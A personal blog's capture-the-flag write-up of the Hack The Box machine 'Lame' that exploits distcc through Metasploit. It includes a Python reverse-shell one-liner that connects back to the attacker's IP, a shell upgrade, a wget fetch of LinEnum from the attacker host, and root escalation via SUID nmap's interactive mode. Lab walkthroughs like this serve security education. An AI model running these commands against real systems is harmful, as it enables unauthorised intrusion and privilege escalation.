Thursday, April 11, 2019

[Write-up] Hack The Box :: Lame, Part 2








In my last post, I used Metasploit to exploit a SMB vulnerability on HTB’s Lame and get root right off the bat. But, we also found that another vulnerable application – distcc – was listening on port 3632. Let’s run through that and then do some privilege escalation.

Check out my previous post here:




First, let’s hit up El Goog to see what known exploits are available for distcc.



The very first link leads us to Rapid7’s page for a Metasploit module. So, let’s give it a try.

root@kali:~# msfconsole

[-] ***rting the Metasploit Framework console...|

[-] * WARNING: No database support: No database YAML file

[-] ***

                                                 



Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f

EFLAGS: 00010046

eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001

esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60

ds: 0018   es: 0018  ss: 0018

Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)





Stack: 90909090990909090990909090

       90909090990909090990909090

       90909090.90909090.90909090

       90909090.90909090.90909090

       90909090.90909090.09090900

       90909090.90909090.09090900

       ..........................

       cccccccccccccccccccccccccc

       cccccccccccccccccccccccccc

       ccccccccc.................

       cccccccccccccccccccccccccc

       cccccccccccccccccccccccccc

       .................ccccccccc

       cccccccccccccccccccccccccc

       cccccccccccccccccccccccccc

       ..........................

       ffffffffffffffffffffffffff

       ffffffff..................

       ffffffffffffffffffffffffff

       ffffffff..................

       ffffffff..................

       ffffffff..................





Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00

Aiee, Killing Interrupt handler

Kernel panic: Attempted to kill the idle task!

In swapper task - not syncing





       =[ metasploit v5.0.4-dev                           ]

+ -- --=[ 1852 exploits - 1047 auxiliary - 325 post       ]

+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]

+ -- --=[ 2 evasion                                       ]



msf5 > search distcc



Matching Modules

================



   Name                           Disclosure Date  Rank       Check  Description

   ----                           ---------------  ----       -----  -----------

   exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution





msf5 > use exploit/unix/misc/distcc_exec

msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.10.3

rhosts => 10.10.10.3

msf5 exploit(unix/misc/distcc_exec) > exploit



[*] Started reverse TCP double handler on 10.10.14.15:4444

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo uANPhYOytemCLjCC;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "uANPhYOytemCLjCC\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:51297) at 2019-04-11 07:01:05 -0400


Now that we have a remote shell, let’s verify we’ve come to the right place and see who we are running as.



ifconfig

eth0      Link encap:Ethernet  HWaddr 00:50:56:b2:4d:ba 

          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0

          inet6 addr: dead:beef::250:56ff:feb2:4dba/64 Scope:Global

          inet6 addr: fe80::250:56ff:feb2:4dba/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:183209 errors:0 dropped:0 overruns:0 frame:0

          TX packets:4631 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:13626432 (12.9 MB)  TX bytes:739675 (722.3 KB)

          Interrupt:19 Base address:0x2000



lo        Link encap:Local Loopback 

          inet addr:127.0.0.1  Mask:255.0.0.0

          inet6 addr: ::1/128 Scope:Host

          UP LOOPBACK RUNNING  MTU:16436  Metric:1

          RX packets:40148 errors:0 dropped:0 overruns:0 frame:0

          TX packets:40148 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:0

          RX bytes:20057083 (19.1 MB)  TX bytes:20057083 (19.1 MB)



id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

We are in, but not root. Time to gather some more information to see what our priv esc options are. But first, I want to upgrade this shell to be fully interactive. Unfortunately, Metasploit isn’t a great place to do this because of its session management. So let’s pop another reverse shell back to our Kali box and then upgrade it.
First, I start a netcat listener.

root@kali:~# nc -nvlp 9001

listening on [any] 9001 ...

Then, I’ll run this Python reverse shell on the target box. This can be found on pentestmonkey (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We catch the reverse shell on the Kali box.

root@kali:~# nc -nvlp 9001

listening on [any] 9001 ...

connect to [10.10.14.15] from (UNKNOWN) [10.10.10.3] 49674

sh: no job control in this shell

sh-3.2$

Now to upgrade. I always copy and paste the commands from this guide when upgrading shells: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/. Check out the full guide for some other tips.

sh-3.2$ python -c 'import pty; pty.spawn("/bin/bash")'

daemon@lame:/tmp$



[CTRL] + [Z] to background the netcat process



[1]+  Stopped                 nc -nvlp 9001

root@kali:~# stty raw -echo

root@kali:~# fg

Hit [ENTER] a few times.


We now have a fully interactive shell with tab completion.

Next, I want to download and run LinEnum.sh on the target box. LinEnum is a privilege escalation enumeration script and automates a lot of the tedium involved in priv esc.


First, from my Kali box:

Use wget to download the script from Github.

root@kali:~/htb/lame/privesc# wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-04-11 07:44:15--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: ‘LinEnum.sh’

LinEnum.sh                   100%[============================================>]  44.57K  --.-KB/s    in 0.03s  

2019-04-11 07:44:15 (1.30 MB/s) - ‘LinEnum.sh’ saved [45639/45639]

And then use the python module SimpleHTTPServer to host it.

root@kali:~/htb/lame/privesc# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now from the target, I use wget to download the script.

daemon@lame:/tmp$ wget 10.10.14.15/LinEnum.sh
--06:49:19--  http://10.10.14.15/LinEnum.sh
           => `LinEnum.sh.1'
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45,639 (45K) [text/x-sh]

100%[====================================>] 45,639        --.--K/s            

06:49:19 (359.15 KB/s) - `LinEnum.sh.1' saved [45639/45639]

Make the script executable using chmod.

daemon@lame:/tmp$ chmod +x LinEnum.sh

And then execute. I’m using -t for thorough scans and then outputting the results to file, LinEnum.results.

daemon@lame:/tmp$ ./LinEnum.sh -t > LinEnum.results
Exerpt from Linenum.results:
[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr

Looking through the results, I noticed the nmap is owned by root and has the SUID bit set. This means we can execute the binary as root. For some more info on SUID, check this out: https://pentestlab.blog/2017/09/25/suid-executables/

Fortunately for us, nmap can be run in interactive mode and this will be our path to root.

Start nmap in interactive mode:

daemon@lame:/tmp$ /usr/bin/nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap>

I'll see what privileges I have first. Use ! to enter shell commands.

nmap> !id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

And then launch another bash session.

nmap> !sh
sh-3.2#

And we’re golden. I can now collect the flag in root.txt.

sh-3.2# cat /root/root.txt
92caac3be140ef****************

No comments:

Post a Comment